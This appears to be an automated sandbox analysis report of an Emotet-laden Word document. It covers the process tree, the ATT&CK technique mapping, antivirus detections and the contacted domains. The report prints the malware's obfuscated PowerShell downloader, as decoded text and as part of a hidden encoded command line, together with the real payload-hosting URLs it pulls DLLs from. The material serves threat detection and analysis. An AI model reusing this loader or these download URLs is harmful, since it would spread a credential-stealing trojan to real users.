                      Source: unknownProcess created: Base64 decoded seT-VarIable ('G'+'Hp') ([tYPe]("{3}{2}{5}{4}{6}{1}{0}"-f 'Y','TOR','Y','S','Ir','stem.Io.d','EC') ) ; $Xo37t = [TYpE]("{2}{3}{1}{0}{4}"-f'NtMAnaGe','m.nEt.SERVICePoi','sYsT','e','R'); $Mpdyr_1=$N5_G + [char](33) + $H92K;$G85V=('P'+('5'+'7B')); ( iTeM ('VA'+'RiabL'+'e:GHP')).vAlue::"CRE`At`ED`irECtOry"($HOME + (('{0}O3pp1b'+'5{'+'0}'+('Y84vhd'+'h')+'{0}') -F [CHar]92));$C46R=('B4'+'1K'); ( dir vaRIaBlE:XO37t ).ValUe::"SeCUrIt`yProto`C`oL" = (('T'+'ls1')+'2');$I53H=(('C1'+'5')+'E');$Pf_wys3 = (('A'+'41')+'O');$E42T=(('D7'+'1')+'H');$I3z2csr=$HOME+((('FZoO'+'3'+'pp1')+('b5FZ'+'oY8'+'4vh')+'d'+'h'+('FZ'+'o'))."rEP`L`ACE"(('F'+'Zo'),[STRinG][chAr]92))+$Pf_wys3+'.d' + 'll';$E04E=(('Z'+'99')+'Q');$S84h9hn='h' + 'tt' + 'p';$Fouo1h1=(('x '+'['+' sh b'+'://u')+('ag'+'r')+'it'+'ec'+'h'+('.'+'co')+('m'+'/c'+'gi-b')+'i'+('n/'+'a5G'+'/!x')+' ['+(' '+'sh'+' '+'b://'+'www.91y')+('uda'+'o'+'.co')+('m/wp'+'-'+'ad')+('min/'+'KKH'+'t')+('1/!x ['+' '+'sh b'+':/')+'/'+('yo'+'urc')+('leanersur'+'fa'+'ce'+'s')+('.com'+'/')+('fo'+'ur-')+('m'+'on'+'ks-acasz/O')+'2m'+'y'+('/!x '+'[')+' s'+('h'+' b:'+'/'+'/layman')+('co'+'d')+'er'+'.c'+'o'+('m/'+'r')+('ustic-dec'+'o'+'r')+('-1g'+'b'+'ad/Us/!x [ ')+('sh '+'bs://'+'rb'+'d')+'ck'+'.'+('c'+'om/')+('wp-c'+'ont')+('en'+'t')+('/u'+'ploads/suc'+'u'+'ri/le'+'wf')+('K/!'+'x ')+'[ '+'sh'+' b'+'s'+':/'+('/fifa'+'coi'+'nsbo'+'x.c')+('o'+'m/w')+('p-'+'c')+('o'+'nt'+'ent/7gY')+('t/!'+'x ')+('['+' sh '+'b'+'://seama')+'rt'+('.i'+'nf')+'o'+('/a'+'
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded seT-VarIable ('G'+'Hp') ([tYPe]("{3}{2}{5}{4}{6}{1}{0}"-f 'Y','TOR','Y','S','Ir','stem.Io.d','EC') ) ; $Xo37t = [TYpE]("{2}{3}{1}{0}{4}"-f'NtMAnaGe','m.nEt.SERVICePoi','sYsT','e','R'); $Mpdyr_1=$N5_G + [char](33) + $H92K;$G85V=('P'+('5'+'7B')); ( iTeM ('VA'+'RiabL'+'e:GHP')).vAlue::"CRE`At`ED`irECtOry"($HOME + (('{0}O3pp1b'+'5{'+'0}'+('Y84vhd'+'h')+'{0}') -F [CHar]92));$C46R=('B4'+'1K'); ( dir vaRIaBlE:XO37t ).ValUe::"SeCUrIt`yProto`C`oL" = (('T'+'ls1')+'2');$I53H=(('C1'+'5')+'E');$Pf_wys3 = (('A'+'41')+'O');$E42T=(('D7'+'1')+'H');$I3z2csr=$HOME+((('FZoO'+'3'+'pp1')+('b5FZ'+'oY8'+'4vh')+'d'+'h'+('FZ'+'o'))."rEP`L`ACE"(('F'+'Zo'),[STRinG][chAr]92))+$Pf_wys3+'.d' + 'll';$E04E=(('Z'+'99')+'Q');$S84h9hn='h' + 'tt' + 'p';$Fouo1h1=(('x '+'['+' sh b'+'://u')+('ag'+'r')+'it'+'ec'+'h'+('.'+'co')+('m'+'/c'+'gi-b')+'i'+('n/'+'a5G'+'/!x')+' ['+(' '+'sh'+' '+'b://'+'www.91y')+('uda'+'o'+'.co')+('m/wp'+'-'+'ad')+('min/'+'KKH'+'t')+('1/!x ['+' '+'sh b'+':/')+'/'+('yo'+'urc')+('leanersur'+'fa'+'ce'+'s')+('.com'+'/')+('fo'+'ur-')+('m'+'on'+'ks-acasz/O')+'2m'+'y'+('/!x '+'[')+' s'+('h'+' b:'+'/'+'/layman')+('co'+'d')+'er'+'.c'+'o'+('m/'+'r')+('ustic-dec'+'o'+'r')+('-1g'+'b'+'ad/Us/!x [ ')+('sh '+'bs://'+'rb'+'d')+'ck'+'.'+('c'+'om/')+('wp-c'+'ont')+('en'+'t')+('/u'+'ploads/suc'+'u'+'ri/le'+'wf')+('K/!'+'x ')+'[ '+'sh'+' b'+'s'+':/'+('/fifa'+'coi'+'nsbo'+'x.c')+('o'+'m/w')+('p-'+'c')+('o'+'nt'+'ent/7gY')+('t/!'+'x ')+('['+' sh '+'b'+'://seama')+'rt'+('.i'+'nf')+'o'+('/a'+'
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9AC
gAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 24_2_10001630 EntryPoint,GetUserNameA,CreateMetaFileW,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,DrawMenuBar,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Emotet

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 11 | Disable or Modify Tools 1 | OS Credential Dumping | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scripting 22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 3 | LSASS Memory | File and Directory Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Native API 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 22 | Security Account Manager | System Information Discovery 15 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | Exploitation for Client Execution 3 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 11 | NTDS | Security Software Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap |  | Carrier Billing Fraud
                      Cloud Accounts | Command and Scripting Interpreter 211 | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Virtualization/Sandbox Evasion 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | PowerShell 2 | Rc.common | Rc.common | Masquerading 11 | Cached Domain Credentials | Process Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 11 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact

                      Behavior Graph

                      Behavior Graph ID: 343897
                      Sample: Mensaje-22-012021.doc
                      Start date: 25/01/2021
                      Architecture: WINDOWS
                      Score: 100

                      Signatures on the sample: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 11 other signatures.

                      Process tree (each child process is listed under the process that started it):

                      • cmd.exe
                        Signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found
                        • powershell.exe 12 9
                          DNS/IP: uagritech.com 162.241.253.129, 49165, 80 UNIFIEDLAYER-AS-1US United States; www.91yudao.com 124.156.135.253, 80 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore; yourcleanersurfaces.com 23.227.169.146, 49167, 80 HVC-ASUS United States
                          Dropped file: C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll, data
                          • rundll32.exe
                            • rundll32.exe
                              • rundll32.exe 2 (Hides that the sample has been downloaded from the Internet (zone.identifier))
                                • rundll32.exe
                                  • rundll32.exe 1 (Hides that the sample has been downloaded from the Internet (zone.identifier))
                                    • rundll32.exe
                                      • rundll32.exe 1 (Hides that the sample has been downloaded from the Internet (zone.identifier))
                                        • rundll32.exe
                        • msg.exe
                      • WINWORD.EXE 293 24


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source                 Detection  Scanner        Label
Mensaje-22-012021.doc  62%        Virustotal
Mensaje-22-012021.doc  35%        Metadefender
Mensaje-22-012021.doc  62%        ReversingLabs  Script-Macro.Trojan.Emotet

                      Dropped Files

                      No Antivirus matches

Unpacked PE Files

Source                                Detection  Scanner  Label
20.2.rundll32.exe.220000.1.unpack     100%       Avira    HEUR/AGEN.1110387
19.2.rundll32.exe.10000000.2.unpack   100%       Avira    HEUR/AGEN.1110387
7.2.rundll32.exe.210000.1.unpack      100%       Avira    HEUR/AGEN.1110387
8.2.rundll32.exe.10000000.3.unpack    100%       Avira    HEUR/AGEN.1110387
7.2.rundll32.exe.10000000.2.unpack    100%       Avira    HEUR/AGEN.1110387
13.2.rundll32.exe.10000000.2.unpack   100%       Avira    HEUR/AGEN.1110387
18.2.rundll32.exe.1c0000.1.unpack     100%       Avira    HEUR/AGEN.1110387
23.2.rundll32.exe.290000.1.unpack     100%       Avira    HEUR/AGEN.1110387
21.2.rundll32.exe.10000000.2.unpack   100%       Avira    HEUR/AGEN.1110387
22.2.rundll32.exe.170000.0.unpack     100%       Avira    HEUR/AGEN.1110387
11.2.rundll32.exe.210000.1.unpack     100%       Avira    HEUR/AGEN.1110387
17.2.rundll32.exe.1b0000.0.unpack     100%       Avira    HEUR/AGEN.1110387
17.2.rundll32.exe.1d0000.1.unpack     100%       Avira    HEUR/AGEN.1110387
10.2.rundll32.exe.10000000.3.unpack   100%       Avira    HEUR/AGEN.1110387
16.2.rundll32.exe.270000.1.unpack     100%       Avira    HEUR/AGEN.1110387
11.2.rundll32.exe.10000000.2.unpack   100%       Avira    HEUR/AGEN.1110387
9.2.rundll32.exe.2b0000.1.unpack      100%       Avira    HEUR/AGEN.1110387
24.2.rundll32.exe.10000000.0.unpack   100%       Avira    TR/Spy.Gen
21.2.rundll32.exe.300000.1.unpack     100%       Avira    HEUR/AGEN.1110387
23.2.rundll32.exe.10000000.2.unpack   100%       Avira    HEUR/AGEN.1110387
14.2.rundll32.exe.10000000.3.unpack   100%       Avira    HEUR/AGEN.1110387
20.2.rundll32.exe.200000.0.unpack     100%       Avira    HEUR/AGEN.1110387
12.2.rundll32.exe.10000000.3.unpack   100%       Avira    HEUR/AGEN.1110387
20.2.rundll32.exe.10000000.3.unpack   100%       Avira    HEUR/AGEN.1110387
16.2.rundll32.exe.10000000.3.unpack   100%       Avira    HEUR/AGEN.1110387
10.2.rundll32.exe.1f0000.1.unpack     100%       Avira    HEUR/AGEN.1110387
8.2.rundll32.exe.1c0000.1.unpack      100%       Avira    HEUR/AGEN.1110387
22.2.rundll32.exe.190000.1.unpack     100%       Avira    HEUR/AGEN.1110387
17.2.rundll32.exe.10000000.2.unpack   100%       Avira    HEUR/AGEN.1110387
18.2.rundll32.exe.1a0000.0.unpack     100%       Avira    HEUR/AGEN.1110387
12.2.rundll32.exe.260000.1.unpack     100%       Avira    HEUR/AGEN.1110387
19.2.rundll32.exe.190000.1.unpack     100%       Avira    HEUR/AGEN.1110387
15.2.rundll32.exe.210000.1.unpack     100%       Avira    HEUR/AGEN.1110387
9.2.rundll32.exe.10000000.2.unpack    100%       Avira    HEUR/AGEN.1110387
13.2.rundll32.exe.1e0000.1.unpack     100%       Avira    HEUR/AGEN.1110387
18.2.rundll32.exe.10000000.3.unpack   100%       Avira    HEUR/AGEN.1110387
22.2.rundll32.exe.10000000.3.unpack   100%       Avira    HEUR/AGEN.1110387
13.2.rundll32.exe.1c0000.0.unpack     100%       Avira    HEUR/AGEN.1110387
14.2.rundll32.exe.700000.1.unpack     100%       Avira    HEUR/AGEN.1110387
8.2.rundll32.exe.1a0000.0.unpack      100%       Avira    HEUR/AGEN.1110387
15.2.rundll32.exe.10000000.2.unpack   100%       Avira    HEUR/AGEN.1110387

Domains

Source                   Detection  Scanner
uagritech.com            5%         Virustotal
www.91yudao.com          7%         Virustotal
yourcleanersurfaces.com  10%        Virustotal

URLs

Source                                                        Detection  Scanner          Label
https://fifacoinsbox.com/wp-content/7gYt/                     100%       Avira URL Cloud  malware
http://ocsp.sectigo.com0                                      0%         URL Reputation   safe
http://yourcleanersurfaces.com/four-monks-acasz/O2my/         100%       Avira URL Cloud  malware
http://www.91yudao.com/wp-admin/KKHt1/                        100%       Avira URL Cloud  malware
http://uagritech.com/cgi-sys/suspendedpage.cgi                0%         Avira URL Cloud  safe
http://seamart.info/alfacgiapi/q92A/                          100%       Avira URL Cloud  malware
http://yourcleanersurfaces.com                                0%         Avira URL Cloud  safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true   0%         URL Reputation   safe
https://rbdck.com/wp-content/uploads/sucuri/lewfK/            100%       Avira URL Cloud  malware
http://uagritech.com/cgi-bin/a5G/                             100%       Avira URL Cloud  malware
http://laymancoder.com/rustic-decor-1gbad/Us/                 100%       Avira URL Cloud  malware
http://www.91yudao.com                                        0%         Avira URL Cloud  safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t         0%         URL Reputation   safe
http://www.icra.org/vocabulary/.                              0%         URL Reputation   safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#         0%         URL Reputation   safe
http://uagritech.com                                          0%         Avira URL Cloud  safe
http://seamart.info/alfacgiapi/q92A/P                         100%       Avira URL Cloud  malware
https://sectigo.com/CPS0D                                     0%         URL Reputation   safe
http://www.%s.comPA                                           0%         URL Reputation   safe

Most of these strings were carved from process memory, so the trailing characters on http://ocsp.sectigo.com0, ...crl0t, ...crt0#, https://sectigo.com/CPS0D, http://www.%s.comPA and http://seamart.info/alfacgiapi/q92A/P are adjacent bytes, not part of the URL; the last one is the same download URL as http://seamart.info/alfacgiapi/q92A/. The Sectigo, windowsmedia.com and icra.org entries and the %s format string are rated safe and are the kind of strings found in code-signing certificates and Windows components. The actionable indicators are the seven paths rated malware, which are the download URLs recovered from powershell.exe memory, and the three hosts the sample actually contacted.

Domains and IPs

Contacted Domains

Name                     IP               Active  Malicious  Antivirus Detection  Reputation
uagritech.com            162.241.253.129  true    true                            unknown
www.91yudao.com          124.156.135.253  true    true                            unknown
yourcleanersurfaces.com  23.227.169.146   true    true                            unknown

Contacted URLs

Name                                                   Malicious  Antivirus Detection       Reputation
http://yourcleanersurfaces.com/four-monks-acasz/O2my/  true       Avira URL Cloud: malware  unknown
http://uagritech.com/cgi-sys/suspendedpage.cgi         false      Avira URL Cloud: safe     unknown
http://uagritech.com/cgi-bin/a5G/                      true       Avira URL Cloud: malware  unknown

cgi-sys/suspendedpage.cgi is the cPanel account-suspended page, which is why it is rated safe: the first download URL on uagritech.com was no longer serving the payload when the sample ran, and the loader moved on to the other hosts in its list.

URLs from Memory and Binaries

Name: http://www.windows.com/pctv.
  Source: rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp
  Malicious: false   Antivirus Detection: -   Reputation: high

Name: http://investor.msn.com
  Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp
  Malicious: false   Antivirus Detection: -   Reputation: high

Name: http://www.msnbc.com/news/ticker.txt
  Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp
  Malicious: false   Antivirus Detection: -   Reputation: high

Name: https://fifacoinsbox.com/wp-content/7gYt/
  Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp
